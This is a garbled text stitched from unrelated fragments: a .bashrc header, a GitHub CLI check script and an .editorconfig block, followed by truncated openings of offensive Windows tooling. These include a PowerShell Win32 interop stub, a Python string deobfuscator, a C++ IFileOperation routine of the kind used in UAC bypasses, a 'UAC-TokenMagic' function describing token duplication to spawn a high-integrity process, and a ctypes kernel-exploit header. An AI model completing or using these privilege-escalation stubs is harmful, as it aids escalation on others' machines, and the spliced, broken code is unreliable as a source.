# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace

#!/usr/bin/env bash
PREFIX=${PREFIX:-/usr/local}
set -eo pipefail

if ! which gh >/dev/null; then
  echo "gh is not installed. Please install gh and try again."
  echo "See https://github.com/cli/cli"
  exit 1
fi

[*]
charset = utf-8
end_of_line = lf
indent_size = 2
indent_style = space
insert_final_newline = true
trim_trailing_whitespace = true
quote_type = single

### Frontend files

$Win32 = @"
using System;
using System.Runtime.InteropServices;

public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]

#!/usr/bin/env python

def deobfuscate_strings(numbers_string, substract_number):
    result = ''
    numbers_list = numbers_string.split('.')
    for number in numbers_list:
        result = result + chr(int(number) - int(substract_number))

#include "stdafx.h"

#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)

// code selectors
#define CS_32 0x23
#define CS_64 0x33

void TestCopy()
{
    BOOL cond = FALSE;
    IFileOperation *FileOperation1 = NULL;
    IShellItem *isrc = NULL, *idst = NULL;
    BIND_OPTS3 bop;
    SHELLEXECUTEINFOW shexec;
    HRESULT r;

    do {

function UAC-TokenMagic {
<#
.SYNOPSIS
    Based on James Forshaw's three part post on UAC, linked below, and possibly a technique
    used by the CIA!

    Essentially we duplicate the token of an elevated process, lower its mandatory
    integrity level, use it to create a new restricted token, impersonate it and
    use the Secondary Logon service to spawn a new process with High IL. Like
    playing hide-and-go-seek with tokens! ;))

import sys, os, mmap, subprocess
from struct import pack, unpack
from ctypes import *

IA32_SYSENTER_ESP = 0x175
IA32_SYSENTER_EIP = 0x176

class PyObj(Structure):
    _fields_ = [( 'ob_refcnt', c_size_t ),